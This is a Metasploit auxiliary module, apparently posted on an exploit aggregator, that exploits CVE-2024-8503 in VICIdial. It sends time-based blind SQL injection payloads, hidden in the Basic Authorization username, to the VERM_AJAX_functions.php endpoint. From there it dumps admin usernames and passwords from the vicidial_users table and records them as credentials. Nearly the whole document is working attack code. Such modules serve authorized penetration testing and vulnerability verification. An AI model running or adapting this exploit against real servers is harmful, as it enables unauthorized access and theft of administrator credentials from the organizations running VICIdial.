Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-SCANNER-HTTP-VICIDIAL_SQL_ENUM_USERS_PASS-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Vicidial SQL Injection Time-based Admin Credentials Enumeration',
'Description' => %q{
This module exploits a time-based SQL injection vulnerability in VICIdial, allowing attackers
to dump admin credentials (usernames and passwords) via SQL injection.
},
'Author' => [
'Valentin Lobstein', # Metasploit Module
'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt'],
['CVE', '2024-8503']
],
'DisclosureDate' => '2024-09-10',
'DefaultOptions' => {
'SqliDelay' => 1,
'VERBOSE' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path of the VICIdial instance', '/']),
OptInt.new('COUNT', [true, 'Number of records to dump', 1])
]
)
end
def run
print_status('Checking if target is vulnerable...')
setup_sqli
return print_error('Target is not vulnerable.') unless @sqli.test_vulnerable
print_good('Target is vulnerable to SQL injection.')
columns = ['User', 'Pass']
data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])
table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 4, 'Columns' => columns)
data.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :password,
private_data: user[1],
service_name: 'VICIdial',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good('Dumped table contents:')
print_line(table.to_s)
end
def setup_sqli
@sqli = create_sqli(
dbms: MySQLi::TimeBasedBlind,
opts: { hex_encode_strings: true }
) do |payload|
random_username = Rex::Text.rand_text_alphanumeric(6, 8)
random_password = Rex::Text.rand_text_alphanumeric(6, 8)
username = "#{random_username}', '', (#{payload}));# "
credentials = "#{username}:#{random_password}"
credentials_base64 = Rex::Text.encode_base64(credentials)
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'VERM', 'VERM_AJAX_functions.php'),
'vars_get' => { 'function' => 'log_custom_report' },
'headers' => {
'Authorization' => "Basic #{credentials_base64}"
}
})
end
end
end